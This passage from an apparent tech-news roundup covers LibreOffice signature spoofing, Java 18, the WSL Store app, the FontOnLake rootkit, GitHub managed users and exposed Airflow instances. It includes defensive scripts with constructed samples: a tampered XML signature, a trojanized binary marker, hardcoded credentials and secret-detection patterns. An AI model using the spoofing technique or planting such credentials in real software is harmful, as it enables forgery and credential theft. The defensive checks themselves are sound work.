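           b'</ds:SignatureProperty></ds:SignatureProperties></ds:Object>')
TAMPERED = GOOD.replace(b"</ds:Signature>", SPLICED + b"</ds:Signature>")

if __name__ == "__main__":
    print("good:", check_signing_times(GOOD), trusted_signing_time(GOOD))
    print("tampered:", check_signing_times(TAMPERED), trusted_signing_time(TAMPERED))
```

The design choice is that the displayed time comes from `trusted_signing_time`, which refuses to return anything unless the structure is clean; a viewer that picks "the first dc:date it finds" is the behaviour the fixed LibreOffice releases moved away from.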

How to Mitigate against LibreOffice's Digital Signature Spoofing?



The flaws were reported by the NDS group at Ruhr University Bochum, and The Document Foundation has promptly issued security fixes for all three.

The flaws were fixed in LibreOffice versions 7.0.5, 7.0.6, 7.1.1 and 7.1.2, so LibreOffice users should update to the latest versions.

LibreOffice susceptible to Critical Digital Signature Spoofing Flaws

The Java Development Kit (JDK) 18 release is still some months away, but Java 18 has already started to take shape, with a simple web server proposal and a proposal to re-incubate the foreign function and memory API.

Java 17 brought new interface types for PRNGs, including jumpable PRNGs, and implementations of an additional class of splittable PRNG algorithms (LXM); the new interface, RandomGenerator, offers a uniform API for all new and existing PRNGs.

The JDK Enhancement Proposal (JEP) index cites record patterns and an array of other proposals as expected for JDK 18, although they have not all been officially targeted.

What to Expect in Java 18 and the Final Release date?



Java 18 is due for release in March 2022, and has already started to take shape, with proposals to preview record patterns and array patterns, incubate the vector API, and adopt UTF-8 as the default character set.



JDK 17 was a long-term support (LTS) release, meaning it will receive at least eight years of support from Oracle, while JDK 18 is a short-term feature release that will be supported for only six months. Below are some of the proposals officially targeted for JDK 18:

  • Foreign function and memory API: intended to replace JNI with a superior, pure-Java development model
  • Code snippets in Java API documentation: a @snippet tag for the JavaDoc Standard Doclet to simplify the inclusion of example source code in API documentation
  • Preview of record patterns and array patterns: enhancing the language with record patterns to deconstruct record values and array patterns to deconstruct array values
  • Vector API: vector computations that compile at run time to optimal vector instructions on supported CPUs, achieving performance superior to equivalent scalar computations
  • Simple web server: a command-line tool to start a minimal web server that serves static files only


If you're a developer and want early access to open-source builds of JDK 18, you can get them at jdk.java.net. Note that JDK 18 is not due until March 2022 and will be supported for only six months.

JDK 18: What to Expect in Java 18 and the Final Release date?

Windows Subsystem for Linux (WSL) is a compatibility layer for running Linux binary executables natively on Windows machines, introduced as a feature of Windows 10.

Now Microsoft has launched a standalone WSL app in the Microsoft Store for Windows 11 machines, which lets users get the latest WSL updates and features faster without needing to update their Windows version. This is an initial preview, intended to ensure quality before the app is made generally available.

Microsoft maintains that the WSL app is the exact same WSL users already know and love; all that has changed is how it is installed and updated.

Why should WSL users be excited about this change?



Until now, WSL was an optional component inside Windows, meaning users had to enable it through the "Turn Windows Features on or off" dialog and restart the machine.



The binaries that make up WSL's logic were part of the Windows image, serviced and updated as part of Windows itself. With the WSL app, you get access to WSL features faster and don't have to update your Windows version to get the latest WSL updates.

This change decouples WSL from the Windows version, allowing users to update it through the Microsoft Store. Once new features such as GPU compute and Linux file-system drive mounting are released, you'll get them right away without updating the entire OS.

How to Download and Install the WSL App from the Microsoft Store?



First, make sure your machine is running Windows 11 (build 22000 or higher) and that the Virtual Machine Platform optional component is enabled.

This can be done by running dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all in an elevated PowerShell prompt. Then open the Microsoft Store page for the WSL app, click Install, and install any Linux distro of your choice to start using it.

Microsoft debuts WSL App for Windows 11 in the Microsoft Store

There is a new malware family, dubbed "FontOnLake" by cybersecurity firm ESET, that uses custom, well-designed modules and mainly targets systems running Linux.

The modules employed by this malware are under constant development and give operators remote access, credential collection and proxy-server functionality; to collect data or conduct other malicious activity, the malware uses modified legitimate binaries that have been adjusted to load further components.

FontOnLake's sneaky nature combined with its advanced design suggests it is used in targeted attacks. The trojanized binaries, such as cat, kill and sshd, are commonly used on Linux systems and additionally serve as a persistence mechanism.

How does the FontOnLake rootkit malware target Linux systems?



According to ESET researchers, the first known file of this malware family appeared on VirusTotal last May, with other samples uploaded throughout the year. The location of the C&C server and the countries from which the samples were uploaded to VirusTotal suggest that its targets are mainly in Southeast Asia.



FontOnLake's currently known components fall into three groups: trojanized applications, backdoors, and rootkits, the last being kernel-mode components that mostly hide and disguise their presence, assist with updates, or provide fallback backdoors.

The trojanized applications are used mostly to load custom backdoor or rootkit modules, but they can also collect sensitive data. All of the trojanized files are standard Linux utilities, and each serves as a persistence method because they are commonly executed at system start-up. How these trojanized applications initially reach their victims is still unknown.
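Because the persistence described above lives in replaced copies of stock utilities, the most direct check is to compare the installed binaries with the checksums the package manager recorded at install time. The block below is an added example, not ESET's tooling: it parses dpkg's /var/lib/dpkg/info/<pkg>.md5sums format (what `dpkg --verify` reads; `rpm -Va` plays the same role on RPM systems) and reports missing or modified files. The manifest and file contents are constructed; real ELF binaries are obviously larger. One caveat the article itself implies: a kernel-mode rootkit can lie to user space, so run this from a clean boot or against a mounted image of the disk before trusting a clean result.

```python
"""Package-checksum integrity check for trojanized utilities (added example)."""
import hashlib
from typing import Callable, Dict, List


def parse_md5sums(text: str) -> Dict[str, str]:
    """'<md5>  <path relative to />' per line  ->  {'/path': md5}."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        digest, _, rel = line.partition("  ")
        expected["/" + rel] = digest
    return expected


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def read_local(path: str) -> bytes:
    with open(path, "rb") as fh:
        return fh.read()


def verify_files(expected: Dict[str, str],
                 read_file: Callable[[str], bytes] = read_local) -> List[Dict[str, str]]:
    """One finding per missing or modified file; an empty list means clean.
    `read_file` is injectable so the check can also run on constructed data."""
    findings = []
    for path, want in sorted(expected.items()):
        try:
            data = read_file(path)
        except FileNotFoundError:
            findings.append({"path": path, "status": "missing"})
            continue
        have = md5_hex(data)
        if have != want:
            findings.append({"path": path, "status": "modified",
                             "expected": want, "actual": have})
    return findings


# Constructed "clean" contents of the utilities the article names.
CLEAN = {
    "/bin/cat": b"\x7fELF clean cat binary",
    "/bin/kill": b"\x7fELF clean kill binary",
    "/usr/sbin/sshd": b"\x7fELF clean sshd binary",
}
# Manifest as the package manager would have written it at install time.
MANIFEST = "\n".join(f"{md5_hex(data)}  {path.lstrip('/')}" for path, data in CLEAN.items())

# The same system after a trojanized cat was dropped in (loads an extra module).
INFECTED = dict(CLEAN)
INFECTED["/bin/cat"] = CLEAN["/bin/cat"] + b"\x00dlopen(/usr/lib/.hidden/module.so)"


def _reader(fs: Dict[str, bytes]) -> Callable[[str], bytes]:
    """In-memory stand-in for the filesystem, used with the constructed samples."""
    def read(path: str) -> bytes:
        if path not in fs:
            raise FileNotFoundError(path)
        return fs[path]
    return read


if __name__ == "__main__":
    print("clean system:", verify_files(parse_md5sums(MANIFEST), _reader(CLEAN)))
    print("infected system:", verify_files(parse_md5sums(MANIFEST), _reader(INFECTED)))
```

MD5 is used only because that is what dpkg stores; it is fine for spotting a swapped binary but, for anything adversarial, pin the manifest itself (or the package files) to a hash you obtained out of band.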

The backdoors discovered are all written in C++ and all use, in slightly different ways, the same Asio library from Boost for asynchronous networking and low-level I/O, along with Poco, Protobuf and STL features such as smart pointers.

How to Mitigate against FontOnLake Malware?



Organizations or individuals who want to protect their Linux endpoints or servers from this threat should use a multilayered security product and keep their Linux distribution updated to the latest version.

If you require further technical details on FontOnLake, you can check out the comprehensive white paper provided by ESET.

Linux Systems targeted in New Rootkit Malware campaign

GitHub Enterprise Cloud now lets customers centrally manage team memberships through their identity provider, using GitHub's Enterprise Managed Users service.

With Enterprise Managed Users, organizations can connect identity providers such as Azure Active Directory and Okta directly to GitHub Enterprise Cloud, which enables management of GitHub identities and access for employees and streamlines processes like onboarding and user group management.

The move is perhaps intended to help organizations of all sizes to easily transition software development operations to the cloud.

About GitHub's Enterprise Managed Users Service



GitHub's Enterprise Managed Users service lets you control the user accounts of enterprise members through your identity provider (IdP).



You can simplify authentication with SAML single sign-on (SSO) and provision and deprovision user accounts for enterprise members: users assigned to the GitHub Enterprise Managed User application in the IdP are provisioned as new user accounts on GitHub and added to your enterprise. Usernames, profile data, team membership and repository access are all controlled from the IdP.

Team membership within an organization in your enterprise can be managed directly through your IdP, allowing you to control repository access with IdP groups; organization membership can be managed manually or automatically as managed users are added to teams within the organization.

You can grant managed users access to contribute to repositories within your enterprise, but managed users can't create public content or collaborate with other users, organizations, and enterprises on GitHub.

However, to use Enterprise Managed Users you need a separate type of enterprise account with Enterprise Managed Users enabled. See "About enterprises with managed users" for more information on creating this account.

Azure Active Directory and Okta connect directly to GitHub Enterprise Cloud

Apache Airflow is an open-source workflow management platform that simplifies the process of creating and managing complex workflows, with plug-and-play integrations with many technologies.

Because workflow management platforms are indispensable for automating business and IT tasks, making it easier to create, schedule and monitor workflows, they are typically cloud-based for accessibility and scalability. However, misconfigured instances make these platforms ideal targets for attackers.

Intezer researchers discovered a number of unprotected Apache Airflow instances exposing sensitive data of several popular companies around the world, including credentials for services such as Amazon Web Services (AWS), Google Cloud Platform (GCP) and GitHub Enterprise Cloud.

How misconfigured Airflow instances lead to credential leakage for popular services



The configuration file (airflow.cfg), created when Airflow is first started, holds Airflow's configuration and can be edited. It can also contain sensitive information such as passwords and keys.



The main risk of a misconfigured Airflow instance is exposed credentials, which can give a threat actor access to legitimate business accounts and databases and the ability to move laterally. If the "expose_config" setting in the file is set to "True", anyone can read the configuration from the web server UI, which can expose those credentials.

According to the researchers, the most common way credentials leak in Airflow is insecure coding practice: many instances had hardcoded passwords inside the Python DAG code. Airflow plugins could also be abused to run malicious code.

When such instances are exposed to the internet with authentication disabled, the data becomes accessible to everyone, and the leaked sensitive data gives attackers information about the organization behind the exposed server.
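The two leak paths above, a readable airflow.cfg and secrets hardcoded in DAG code, are both checkable from the files themselves. The block below is an added example, not Intezer's or Airflow's code: it reads an airflow.cfg and flags the settings that expose it (`expose_config`, an unauthenticated API backend, and the 1.10-era `[webserver] authenticate` switch) as well as secrets stored inline, then walks DAG source with `ast` for string literals assigned to password-, secret- or token-like names or passed as such keyword arguments. The option names are Airflow's own; the config and DAG samples are constructed, and the AWS key is the example key from AWS's documentation.

```python
"""Audit of airflow.cfg exposure settings and hardcoded DAG secrets (added example)."""
import ast
import configparser
import re
from typing import List, Tuple

SECRET_NAME = re.compile(r"(pass(word)?|secret|token|api_?key|private_?key)", re.I)
# Real Airflow options that hold secrets; they also accept a *_cmd variant or an
# AIRFLOW__<SECTION>__<OPTION> environment variable so they need not sit in the file.
SECRET_OPTIONS = [("core", "sql_alchemy_conn"), ("core", "fernet_key"), ("smtp", "smtp_password")]
DB_URL_WITH_PASSWORD = re.compile(r"://[^/:@]+:[^@]+@")


def audit_airflow_cfg(cfg_text: str) -> List[str]:
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(cfg_text)
    issues = []
    if cp.getboolean("webserver", "expose_config", fallback=False):
        issues.append("[webserver] expose_config=True: airflow.cfg, secrets included, is "
                      "readable from the web UI")
    if cp.get("webserver", "authenticate", fallback="True").lower() == "false":
        issues.append("[webserver] authenticate=False: UI open to anyone who can reach it")
    if cp.get("api", "auth_backend", fallback="").strip() == "airflow.api.auth.backend.default":
        issues.append("[api] auth_backend=default: REST API accepts unauthenticated calls")
    for section, option in SECRET_OPTIONS:
        value = cp.get(section, option, fallback="")
        if not value or (option == "sql_alchemy_conn" and not DB_URL_WITH_PASSWORD.search(value)):
            continue
        issues.append(f"[{section}] {option} stored inline; use {option}_cmd or the "
                      f"AIRFLOW__{section.upper()}__{option.upper()} environment variable")
    return issues


def _is_str(node: ast.AST) -> bool:
    return isinstance(node, ast.Constant) and isinstance(node.value, str) and bool(node.value)


def find_hardcoded_secrets(source: str) -> List[Tuple[int, str]]:
    """(line, name) for every non-empty string literal bound to a secret-looking
    variable or passed as a secret-looking keyword argument."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign) and _is_str(node.value):
            for target in node.targets:
                if isinstance(target, ast.Name) and SECRET_NAME.search(target.id):
                    hits.append((node.lineno, target.id))
        elif isinstance(node, ast.Call):
            for kw in node.keywords:
                if kw.arg and SECRET_NAME.search(kw.arg) and _is_str(kw.value):
                    hits.append((kw.value.lineno, kw.arg))
    return sorted(hits)


# Constructed configurations: the exposed one beside its hardened counterpart.
EXPOSED_CFG = """\
[core]
sql_alchemy_conn = postgresql+psycopg2://airflow:S3cretPw@db.internal:5432/airflow
fernet_key = c29tZS1mZXJuZXQta2V5LWZvci10aGUtZXhhbXBsZT0=

[webserver]
expose_config = True
authenticate = False

[api]
auth_backend = airflow.api.auth.backend.default
"""

HARDENED_CFG = """\
[core]
sql_alchemy_conn_cmd = cat /run/secrets/airflow_db_url
fernet_key_cmd = cat /run/secrets/airflow_fernet

[webserver]
expose_config = False
authenticate = True

[api]
auth_backend = airflow.api.auth.backend.basic_auth
"""

# Constructed DAG source with the two kinds of hardcoded secret the scanner catches.
DAG_SOURCE = '''\
import psycopg2
from airflow import DAG

AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
BUCKET = "nightly-exports"

def export():
    conn = psycopg2.connect(host="db.internal", user="etl", password="hunter2")
    return conn
'''

if __name__ == "__main__":
    print("exposed:", audit_airflow_cfg(EXPOSED_CFG))
    print("hardened:", audit_airflow_cfg(HARDENED_CFG))
    print("dag secrets:", find_hardcoded_secrets(DAG_SOURCE))
```

The DAG scanner is deliberately name-based: in Airflow the correct home for such values is a Connection or Variable (backed by the Fernet-encrypted metadata DB or an external secrets backend), so any string literal bound to a secret-looking name in DAG code is worth a finding regardless of what the string contains.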

How to Mitigate against the Apache Airflow Misconfiguration?



Apache made significant progress on Airflow's security features in version 2.0, whose changes include enforced login and authentication for all operations in the REST API, among others.

It is therefore strongly recommended that users update their Airflow instances to the latest version and make sure that only authorized users can connect to the platform.

Apache Airflow misconfiguration exposes sensitive data of many popular companies